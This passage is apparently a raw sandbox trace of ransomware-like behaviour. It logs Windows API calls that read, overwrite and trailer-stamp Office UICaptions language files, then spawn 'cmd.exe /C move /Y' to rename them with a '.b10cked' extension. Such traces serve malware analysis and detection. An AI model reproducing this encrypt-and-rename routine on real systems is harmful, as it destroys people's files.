lpWideCharStr="MSOINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0167.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0167.336] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16f60 [0167.336] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.336] CloseHandle (hObject=0x114) returned 1 [0167.338] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX") returned 0x3c [0167.339] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.339] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x7dc, dwThreadId=0x930)) returned 1 [0167.458] CloseHandle (hObject=0x1b4) returned 1 [0167.458] CloseHandle (hObject=0x114) returned 1 [0167.459] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.459] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL 
USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.459] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.459] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.459] ReleaseMutex (hMutex=0xf8) returned 1 [0167.459] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.459] ReleaseMutex (hMutex=0xf8) returned 1 [0167.459] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.459] ReleaseMutex (hMutex=0xf8) returned 1 [0167.459] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.459] ReleaseMutex (hMutex=0xf8) returned 1 [0167.459] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.459] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.459] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.459] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.459] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22424872183) returned 1 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2b2078 [0167.461] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2b2560 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2b2560 [0167.475] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.475] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.475] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.484] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.485] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.488] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.491] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 
| out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0167.493] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0167.497] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.497] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.498] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.498] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.498] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.499] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0167.499] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.501] SetFilePointer (in: hFile=0x114, lDistanceToMove=1310720, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140000 [0167.501] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.503] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.504] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.506] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.508] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0167.511] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0167.516] SetFilePointer (in: hFile=0x114, lDistanceToMove=1310720, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140000 [0167.516] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.517] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.517] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 
[0167.517] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.518] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0167.518] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=-262144, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x272560 [0167.520] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.644] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.645] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.647] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.647] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0167.649] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 
0x7ff60000 [0167.653] SetFilePointer (in: hFile=0x114, lDistanceToMove=-262144, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x272560 [0167.653] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.653] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.654] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.654] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.654] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0167.654] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0167.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.REST.trx_dll", lpUsedDefaultChar=0x0) 
returned 20 [0167.662] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2b2560 [0167.662] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.662] CloseHandle (hObject=0x114) returned 1 [0167.779] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX") returned 0x3c [0167.780] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.781] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, 
